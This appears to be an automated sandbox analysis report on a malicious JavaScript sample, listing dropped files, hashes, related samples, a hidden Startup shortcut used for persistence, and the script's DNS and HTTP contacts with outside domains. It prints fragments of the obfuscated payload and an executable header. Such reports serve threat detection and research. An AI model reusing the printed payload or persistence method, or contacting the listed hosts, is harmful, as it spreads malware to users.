	FileZilla_3.50.0_win64-setup.exe	Get hash	malicious	Browse	204.11.56.48
	FqDxzuy8tK.exe	Get hash	malicious	Browse	208.91.196.145
	20210303948387477467,pdf.exe	Get hash	malicious	Browse	208.91.197.27
	ord.xlsx	Get hash	malicious	Browse	209.99.40.222
	Purchase Order.exe	Get hash	malicious	Browse	208.91.197.91
	PO_98276300.exe	Get hash	malicious	Browse	208.91.197.91
	tqzZKX6qsT.exe	Get hash	malicious	Browse	208.91.197.27
	iQnbU4o7yx.exe	Get hash	malicious	Browse	208.91.196.46
LIQUIDWEBUS	SecuriteInfo.com.VB.Heur2.EmoDldr.16.C2C1C6E0.Gen.19261.xlsm	Get hash	malicious	Browse	67.227.251.48
	file.doc	Get hash	malicious	Browse	67.227.152.97
	N6Ej6HEuQt.exe	Get hash	malicious	Browse	67.225.164.116
	Payslip 3-3-pdf.exe	Get hash	malicious	Browse	69.16.200.142
	Statement_of_Account_as_of_mar_01_2021.xlsm	Get hash	malicious	Browse	67.227.237.109
	Complaint_Letter_1195372013-02192021.xls	Get hash	malicious	Browse	72.52.229.105
	o1N0Ej5dP0.exe	Get hash	malicious	Browse	72.52.168.184
	BL.html	Get hash	malicious	Browse	67.225.226.82
	BL.html	Get hash	malicious	Browse	67.225.226.82
	diskdrill.dmg	Get hash	malicious	Browse	67.225.176.50
	dgaTCZovz.msi	Get hash	malicious	Browse	67.225.133.88
	SecuriteInfo.com.XF.AShadow.4960.21593.xls	Get hash	malicious	Browse	72.52.227.180
	SecuriteInfo.com.XF.AShadow.4960.21593.xls	Get hash	malicious	Browse	72.52.227.180
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	72.52.227.180
	Complaint-1992179913-02182021.xls	Get hash	malicious	Browse	72.52.227.180
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	72.52.227.180
	Complaint-447781983-02182021.xls	Get hash	malicious	Browse	72.52.227.180
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	72.52.227.180
	SecuriteInfo.com.Heur.10413.xls	Get hash	malicious	Browse	72.52.227.180
	ENQUIRY.doc	Get hash	malicious	Browse	67.225.218.11
BODIS-NJUS	PO #6093245.exe	Get hash	malicious	Browse	199.59.242.153
	1feiNnK6Qd.exe	Get hash	malicious	Browse	199.59.242.153
	bXSINeHUUZ.dll	Get hash	malicious	Browse	199.59.242.153
	R8WWx5t2RE.dll	Get hash	malicious	Browse	199.59.242.153
	KCCAfipQl2.dll	Get hash	malicious	Browse	199.59.242.153
	Confirmaci#U00f3n de pago.exe	Get hash	malicious	Browse	199.59.242.153
	twistercrypted.exe	Get hash	malicious	Browse	199.59.242.153
	Order List - 022321-xlxs.exe	Get hash	malicious	Browse	199.59.242.153
	PO_210222.exe	Get hash	malicious	Browse	199.59.242.153
	DHL Document. PDF.exe	Get hash	malicious	Browse	199.59.242.153
	Payment advice.xls	Get hash	malicious	Browse	199.59.242.153
	8nxKYwJna8.exe	Get hash	malicious	Browse	199.59.242.153
	gRd8HGFpL7.exe	Get hash	malicious	Browse	199.59.242.153
	DHL eShipment invoice_pdf.exe	Get hash	malicious	Browse	199.59.242.153
	bAcefnEUjb.exe	Get hash	malicious	Browse	199.59.242.153
	Xi4vVgHekF.exe	Get hash	malicious	Browse	199.59.242.153
	q2EKWldniJ.exe	Get hash	malicious	Browse	199.59.242.153
	Inv_9876567.doc	Get hash	malicious	Browse	199.59.242.153
	4NoiNHCNoU.exe	Get hash	malicious	Browse	199.59.242.153
	mtsWWNDaNF.exe	Get hash	malicious	Browse	199.59.242.153

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	kjymuth.js	Get hash	malicious	Browse
	mitbjisfe.js	Get hash	malicious	Browse
	mitbjisfe.js	Get hash	malicious	Browse
	SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.26335.exe	Get hash	malicious	Browse
	SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.14505.exe	Get hash	malicious	Browse
	SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.31586.exe	Get hash	malicious	Browse
	Q38V8rfI5H.js	Get hash	malicious	Browse
	Q38V8rfI5H.js	Get hash	malicious	Browse
	Z4VzMe8IqZ.js	Get hash	malicious	Browse
	Z4VzMe8IqZ.js	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Bulz.247339.1677.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Bulz.247339.23255.exe	Get hash	malicious	Browse
	CiNPLUJX3z.exe	Get hash	malicious	Browse
	56HMUThTRj.exe	Get hash	malicious	Browse
	7IEK8G8P67.js	Get hash	malicious	Browse
	7IEK8G8P67.js	Get hash	malicious	Browse
	msS0Lp8xag.js	Get hash	malicious	Browse
	msS0Lp8xag.js	Get hash	malicious	Browse
	ookvfbv.js	Get hash	malicious	Browse
	emwkvlhvf.js	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	163840
Entropy (8bit):	5.729539450068024
Encrypted:	false
SSDEEP:	1536:8HSpBlnak9UH8bCAHZ1LQ434syPz7M5hh/kzhwS827HuYHwHugXEYJ6S7775MWUn:aC4HWCp/fM5hvNebgXEYJN73uWUZxtt
MD5:	9A68ADD12EB50DDE7586782C3EB9FF9C
SHA1:	2661E5F3562DD03C0ED21C33E2888E2FD1137D8C
SHA-256:	62A95C926C8513C9F3ACF65A5B33CBB88174555E2759C1B52DD6629F743A59ED
SHA-512:	156CAED6E1BF27B275E4BA0707FB550F1BF347A26361D6D3CAD12C612C327686950B47B6C5487110CF8B35A490FAADC812ADE3777FFF7ED76A528D970914A6E0
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: kjymuth.js, Detection: malicious, Browse Filename: mitbjisfe.js, Detection: malicious, Browse Filename: mitbjisfe.js, Detection: malicious, Browse Filename: SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.26335.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.14505.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.31586.exe, Detection: malicious, Browse Filename: Q38V8rfI5H.js, Detection: malicious, Browse Filename: Q38V8rfI5H.js, Detection: malicious, Browse Filename: Z4VzMe8IqZ.js, Detection: malicious, Browse Filename: Z4VzMe8IqZ.js, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Bulz.247339.1677.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Bulz.247339.23255.exe, Detection: malicious, Browse Filename: CiNPLUJX3z.exe, Detection: malicious, Browse Filename: 56HMUThTRj.exe, Detection: malicious, Browse Filename: 7IEK8G8P67.js, Detection: malicious, Browse Filename: 7IEK8G8P67.js, Detection: malicious, Browse Filename: msS0Lp8xag.js, Detection: malicious, Browse Filename: msS0Lp8xag.js, Detection: malicious, Browse Filename: ookvfbv.js, Detection: malicious, Browse Filename: emwkvlhvf.js, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................................n.........Rich...................PE..d....U.E.........."......2...R......@*.........@....................................8w....`.............................................8...8...................................T.......T..........................................................................text..."1.......2.................. ..`.rdata..F....P.......6..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..T............t..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\nsoerwoel\nguvmqit Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	4089
Entropy (8bit):	5.748750516302002
Encrypted:	false
SSDEEP:	96:jioOJIZRGKv7gErecdUB2BuUQmvabn/Otk8MownOC+9mBRQs:jioAWYakkhBXQHgMZnOCLRQs
MD5:	72303BB2A0685E1DC2EBBEF69DDE0528
SHA1:	87D3BC1FB5B205E453D5D2E3418D01791B6A50EF
SHA-256:	03714A6F6271C3A3D13BFB7996B2E77E11B2C94E28DF31FBAEF5FF68E1C020C2
SHA-512:	D5BE79F4203560D65D0DCE5DDCC56C2F93439E6F5E4C4E415A609DDA43A74AFCA08FA7DC37EAA6F96BCA3D632C8FEE44632437444E3286406224FC05561EC3F6
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qX8bODRC2aDPzt6IJCBwajHFDKXIjBHNiK15Ot4+5udkO7djbo9ZURb/sUD4YMghK5Pa+ZC4aBjYsbZiG0uXQQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head> [if IE 6 ]><body class="ie6"><![endif]--> [if IE 7 ]><body class="ie7"><![endif]--> [if IE 8 ]><body class="ie8"><![endif]--> [if IE 9 ]><body class="ie9"><![endif]--> [if (gt IE 9)\|!(IE)]> --><body> <![endif]--><script type="text/javascript">g_pb=(function(){var.DT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.onerror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onlo

C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js Download File
Process:	C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
File Type:	ISO-8859 text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	15523
Entropy (8bit):	5.9174539625971585
Encrypted:	false
SSDEEP:	384:RANdk8H6Hh7WZ+wevLYz7GzPMSs/OdhOGh97XbSV032q0:WN1H6Hh7WZ+/jcG/s/Odhb7XbG032Z
MD5:	E43E6029BB62780558539D8F052D3EAA
SHA1:	41AA8EDAC913960793F6CDF0A27F0A64B8260E6F
SHA-256:	D9CC91FF8D5472CE7224C773927E03CF44A11B5F452E6C65FA9899068ED1F6B7
SHA-512:	D6DD16C4C93B2A2B3D1035989B46BD0C87C9162E54754D8D43359546B4EA3AE77AC12E3FFC1B0AF8FD098CBE3FB681A2C3900AB2B6FC09C448AB48DFA939292B
Malicious:	true
Reputation:	low
Preview:	var a=",{y$gm%r=-5 ,e($t$R$1zO$7:G670v>5&70>5&E&AyO$7Q%~~p\"eD9C45,lm$h%{)$cX55E2E?5[~rK8P$.:I-5E&t\"iliwO~xD9H;C7K$=O]XbPA$\"m!i5Kzg!s>$Xl(s#iD:I2E2H6M6C5I45Wvjvv~3J7L2H:5Iykz3F;C5L5H87\"Pzvv5e5A5rz{5Exx~zz\\df ixx=&-wxv~t2)lzp\"&>0w$R$$i-$Vgm,imSwnzg,7wxv~tm$kCj~pzw/wi#swnzg&>0}$R${y$gm%r=-5 (iy(r5,=55/5Qvx}2(e$h%q=->$?$K9J7K$2$E-Cx%Wv~r\|,F:>2)ywwv~r\|,F-30y$R$v2zr,m(s$qzr,7t(sxi)w7-Aj5A5h=&+wzv$e#i7-Ak5A5h=&xs#t+xzv$e#i7-Av+$R$$i-$Vgm,imSwnzg,7w}i\"pCe&t\"mxem%r7-Ap%$R$paAj+t5A5_r0ysy$R$7&Ah%x5A54Al{$R${y$gm%r=i>$1x(}5 ,e($$R$w2\|iJ%pyi(,z-PxCex(mwyi)$R$G\"5gvxxl5,$-5 3\"Awx$R${y$gm%r=i>$1i5/R$7&Pzvv5x5A54Pj%v5,,e($$$R$E?5r5@5iCpzr\|x}?5r@/>$$R$=x5@Q$J-515x5/5iCg}e(G%hzE,$-A$$;A5xPvzx+v$$belCeww=x>\"Alv$R${y$gm%r=i>$1zvv5x5A5&70$$R$)g=i>?{s($=zvv5v5A54P$($Q$)g=i>$:$J$@$J?5v@/>$$$R$)g=x5/5r>05x5/R$hx(m$kCj(s#G}e(G%hz,$$:$G95/5=L-Pvzx+v$$\"Pzvv5~0s5A5j+rxx~s$,>$1zvv5x{5A5_7lx&>D3-{-2#mxv%w%j2xs#3705&}xtO3D{-{Ck%s\|pz2xs#3705&}x*tO3D{-{Cf~r\|2xs#37aPj%v5,,e($

C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js:Zone.Identifier Download File
Process:	C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\nsoerwoel\qihyo Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.517593238793311
Encrypted:	false
SSDEEP:	3:TX2wI+6LYXTHVr:b2wItL6L1
MD5:	523A50742457815E56AAD125EC0E53DE
SHA1:	5C022557169294028FC87A9DC55EC27B5D74693D
SHA-256:	EC0641018EDE331A8DC2CF30A949210BF1D5F5D0467EDB250F1D375834B5B41B
SHA-512:	E8DEE72B4EEF08174530D8C592A8AEDBD43A05722E6F5FB7914E26134106FBA70E4F297009D40C9A5B5F0C34B1E76E93D3C0CDECECA8C4939C1BB565995128CA
Malicious:	true
Reputation:	low
Preview:	87c21515-2966-a2aa-6b2b-26b01846040a

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ttdwagotd.lnk Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=3, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1104
Entropy (8bit):	3.1740206332378995
Encrypted:	false
SSDEEP:	24:81+f4eaRb1lgrol57NFLolaUo0f9HAv7aB:8bZRb1uro77NFLotouAOB
MD5:	A6F2722FD7B40FA39CAEE142E5C3E52C
SHA1:	03F042E79B7A75CF93DD2163EF5BC43069C05FA3
SHA-256:	C125C49DC745E74A8F7A9E92222E966F972E8CBCB30D47F062CCACDB2713D606
SHA-512:	AB026F4BE515180D3467E390649CE5C87F585546C89727DE7E6774483616B4B8BDF21E29856571DA973E91EE91AD091D0E8D2678CD6FFD106DCFC1CFD48BDAED
Malicious:	true
Reputation:	low
Preview:	L..................F........................................................3....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................h.a.r.d.z.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....\.1...........nsoerwoel.D............................................n.s.o.e.r.w.o.e.l.....b.2...........ibfmvoj.exe.H............................................i.b.f.m.v.o.j...e.x.e.......-.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.n.s.o.e.r.w.o.e.l.\.i.b.f.m.v.o.j...e.x.e.2.".C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.n.s.o.e.r.w.o.e.l.\.p.f.u.r.y.r...j.s.".!.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.

Static File Info

General
File type:	ISO-8859 text, with very long lines, with no line terminators
Entropy (8bit):	5.9174539625971585
TrID:	Java Script (8504/1) 100.00%
File name:	xPUqa4qbDL.js
File size:	15523
MD5:	e43e6029bb62780558539d8f052d3eaa
SHA1:	41aa8edac913960793f6cdf0a27f0a64b8260e6f
SHA256:	d9cc91ff8d5472ce7224c773927e03cf44a11b5f452e6c65fa9899068ed1f6b7
SHA512:	d6dd16c4c93b2a2b3d1035989b46bd0c87c9162e54754d8d43359546b4ea3ae77ac12e3ffc1b0af8fd098cbe3fb681a2c3900ab2b6fc09c448ab48dfa939292b
SSDEEP:	384:RANdk8H6Hh7WZ+wevLYz7GzPMSs/OdhOGh97XbSV032q0:WN1H6Hh7WZ+/jcG/s/Odhb7XbG032Z
File Content Preview:	var a=",{y$gm%r=-5 ,e($t$R$1zO$7:G670v>5&70>5&E&AyO$7Q%~~p\"eD9C45,lm$h%{)$cX55E2E?5[~rK8P$.:I-5E&t\"iliwO~xD9H;C7K$=O]XbPA$\"m!i5Kzg!s>$Xl(s#iD:I2E2H6M6C5I45Wvjvv~3J7L2H:5Iykz3F;C5L5H87\"Pzvv5e5A5rz{5Exx~zz\\df ixx=&-wxv~t2)lzp\"&>0w$R$$i-$Vgm,imSwnz

File Icon


Icon Hash:	e8d69ece968a9ec4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2021 07:01:37.288393974 CET	49702	80	192.168.2.3	204.11.56.48
Mar 10, 2021 07:01:37.462424994 CET	80	49702	204.11.56.48	192.168.2.3
Mar 10, 2021 07:01:37.462594032 CET	49702	80	192.168.2.3	204.11.56.48
Mar 10, 2021 07:01:37.463186979 CET	49702	80	192.168.2.3	204.11.56.48
Mar 10, 2021 07:01:37.635301113 CET	80	49702	204.11.56.48	192.168.2.3
Mar 10, 2021 07:01:37.726541996 CET	49703	80	192.168.2.3	72.52.178.23
Mar 10, 2021 07:01:37.884529114 CET	80	49703	72.52.178.23	192.168.2.3
Mar 10, 2021 07:01:37.885545969 CET	49703	80	192.168.2.3	72.52.178.23
Mar 10, 2021 07:01:37.885823011 CET	49703	80	192.168.2.3	72.52.178.23
Mar 10, 2021 07:01:38.043828964 CET	80	49703	72.52.178.23	192.168.2.3
Mar 10, 2021 07:01:38.240365028 CET	80	49703	72.52.178.23	192.168.2.3
Mar 10, 2021 07:01:38.303832054 CET	49703	80	192.168.2.3	72.52.178.23
Mar 10, 2021 07:01:38.314975023 CET	49704	80	192.168.2.3	199.59.242.153
Mar 10, 2021 07:01:38.435937881 CET	80	49704	199.59.242.153	192.168.2.3
Mar 10, 2021 07:01:38.436131954 CET	49704	80	192.168.2.3	199.59.242.153
Mar 10, 2021 07:01:38.436440945 CET	49704	80	192.168.2.3	199.59.242.153
Mar 10, 2021 07:01:38.557413101 CET	80	49704	199.59.242.153	192.168.2.3
Mar 10, 2021 07:01:38.557725906 CET	80	49704	199.59.242.153	192.168.2.3
Mar 10, 2021 07:01:38.557766914 CET	80	49704	199.59.242.153	192.168.2.3
Mar 10, 2021 07:01:38.557806015 CET	80	49704	199.59.242.153	192.168.2.3
Mar 10, 2021 07:01:38.557833910 CET	80	49704	199.59.242.153	192.168.2.3
Mar 10, 2021 07:01:38.557871103 CET	80	49704	199.59.242.153	192.168.2.3
Mar 10, 2021 07:01:38.557881117 CET	49704	80	192.168.2.3	199.59.242.153
Mar 10, 2021 07:01:38.557934046 CET	49704	80	192.168.2.3	199.59.242.153
Mar 10, 2021 07:01:38.694547892 CET	49704	80	192.168.2.3	199.59.242.153
Mar 10, 2021 07:01:51.138794899 CET	80	49703	72.52.178.23	192.168.2.3
Mar 10, 2021 07:01:51.138955116 CET	49703	80	192.168.2.3	72.52.178.23
Mar 10, 2021 07:01:51.143951893 CET	49703	80	192.168.2.3	72.52.178.23
Mar 10, 2021 07:01:51.300982952 CET	80	49703	72.52.178.23	192.168.2.3
Mar 10, 2021 07:02:08.557809114 CET	80	49704	199.59.242.153	192.168.2.3
Mar 10, 2021 07:02:08.557933092 CET	49704	80	192.168.2.3	199.59.242.153
Mar 10, 2021 07:02:08.558010101 CET	49704	80	192.168.2.3	199.59.242.153
Mar 10, 2021 07:02:08.678965092 CET	80	49704	199.59.242.153	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2021 07:01:23.041506052 CET	53	58643	8.8.8.8	192.168.2.3
Mar 10, 2021 07:01:23.352621078 CET	60985	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:01:23.398683071 CET	53	60985	8.8.8.8	192.168.2.3
Mar 10, 2021 07:01:23.667418003 CET	50200	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:01:23.713546991 CET	53	50200	8.8.8.8	192.168.2.3
Mar 10, 2021 07:01:25.738008022 CET	51281	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:01:25.796827078 CET	53	51281	8.8.8.8	192.168.2.3
Mar 10, 2021 07:01:35.629832029 CET	49199	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:01:35.685457945 CET	53	49199	8.8.8.8	192.168.2.3
Mar 10, 2021 07:01:36.676671982 CET	50620	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:01:37.287056923 CET	53	50620	8.8.8.8	192.168.2.3
Mar 10, 2021 07:01:37.664587021 CET	64938	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:01:37.722069025 CET	53	64938	8.8.8.8	192.168.2.3
Mar 10, 2021 07:01:38.256385088 CET	60152	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:01:38.313544035 CET	53	60152	8.8.8.8	192.168.2.3
Mar 10, 2021 07:01:39.075154066 CET	57544	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:01:39.131778002 CET	53	57544	8.8.8.8	192.168.2.3
Mar 10, 2021 07:01:55.232848883 CET	55984	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:01:55.284255028 CET	53	55984	8.8.8.8	192.168.2.3
Mar 10, 2021 07:01:56.191334009 CET	64185	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:01:56.238444090 CET	53	64185	8.8.8.8	192.168.2.3
Mar 10, 2021 07:02:01.993210077 CET	65110	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:02:02.043646097 CET	53	65110	8.8.8.8	192.168.2.3
Mar 10, 2021 07:02:07.488462925 CET	58361	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:02:07.549479008 CET	53	58361	8.8.8.8	192.168.2.3
Mar 10, 2021 07:02:13.520272017 CET	63492	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:02:13.568730116 CET	53	63492	8.8.8.8	192.168.2.3
Mar 10, 2021 07:02:19.182851076 CET	60831	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:02:19.229460955 CET	53	60831	8.8.8.8	192.168.2.3
Mar 10, 2021 07:02:29.828043938 CET	60100	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:02:29.897990942 CET	53	60100	8.8.8.8	192.168.2.3
Mar 10, 2021 07:02:36.302645922 CET	53195	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:02:36.351711035 CET	53	53195	8.8.8.8	192.168.2.3
Mar 10, 2021 07:02:40.371517897 CET	50141	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:02:40.420521021 CET	53	50141	8.8.8.8	192.168.2.3
Mar 10, 2021 07:02:45.234601974 CET	53023	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:02:45.290242910 CET	53	53023	8.8.8.8	192.168.2.3
Mar 10, 2021 07:03:07.248337984 CET	49563	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:03:07.294415951 CET	53	49563	8.8.8.8	192.168.2.3
Mar 10, 2021 07:03:16.174554110 CET	51352	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:03:16.223556995 CET	53	51352	8.8.8.8	192.168.2.3
Mar 10, 2021 07:03:17.720179081 CET	59349	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:03:17.785280943 CET	53	59349	8.8.8.8	192.168.2.3
Mar 10, 2021 07:03:39.264312983 CET	57084	53	192.168.2.3	8.8.8.8
Mar 10, 2021 07:03:39.313106060 CET	53	57084	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 10, 2021 07:01:36.676671982 CET	192.168.2.3	8.8.8.8	0xd69e	Standard query (0)	legitville.com	A (IP address)	IN (0x0001)
Mar 10, 2021 07:01:37.664587021 CET	192.168.2.3	8.8.8.8	0xa678	Standard query (0)	101legit.com	A (IP address)	IN (0x0001)
Mar 10, 2021 07:01:38.256385088 CET	192.168.2.3	8.8.8.8	0x58f9	Standard query (0)	ww7.101legit.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 10, 2021 07:01:37.287056923 CET	8.8.8.8	192.168.2.3	0xd69e	No error (0)	legitville.com		204.11.56.48	A (IP address)	IN (0x0001)
Mar 10, 2021 07:01:37.722069025 CET	8.8.8.8	192.168.2.3	0xa678	No error (0)	101legit.com		72.52.178.23	A (IP address)	IN (0x0001)
Mar 10, 2021 07:01:38.313544035 CET	8.8.8.8	192.168.2.3	0x58f9	No error (0)	ww7.101legit.com	76899.bodis.com		CNAME (Canonical name)	IN (0x0001)
Mar 10, 2021 07:01:38.313544035 CET	8.8.8.8	192.168.2.3	0x58f9	No error (0)	76899.bodis.com		199.59.242.153	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

legitville.com

101legit.com

ww7.101legit.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49702	204.11.56.48	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 07:01:37.463186979 CET	1423	OUT	GET /0.html HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134 Host: legitville.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49703	72.52.178.23	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 07:01:37.885823011 CET	1424	OUT	GET /0.html HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134 Host: 101legit.com
Mar 10, 2021 07:01:38.240365028 CET	1424	IN	HTTP/1.1 302 Found Date: Wed, 10 Mar 2021 06:01:37 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 X-Powered-By: PHP/5.4.16 Location: http://ww7.101legit.com Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49704	199.59.242.153	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 07:01:38.436440945 CET	1425	OUT	GET / HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134 Host: ww7.101legit.com
Mar 10, 2021 07:01:38.557725906 CET	1426	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 10 Mar 2021 06:01:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qX8bODRC2aDPzt6IJCBwajHFDKXIjBHNiK15Ot4+5udkO7djbo9ZURb/sUD4YMghK5Pa+ZC4aBjYsbZiG0uXQQ== Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 58 38 62 4f 44 52 43 32 61 44 50 7a 74 36 49 4a 43 42 77 61 6a 48 46 44 4b 58 49 6a 42 48 4e 69 4b 31 35 4f 74 34 2b 35 75 64 6b 4f 37 64 6a 62 6f 39 5a 55 52 62 2f 73 55 44 34 59 4d 67 68 4b 35 50 61 2b 5a 43 34 61 42 6a 59 73 62 5a 69 47 30 75 58 51 51 3d 3d 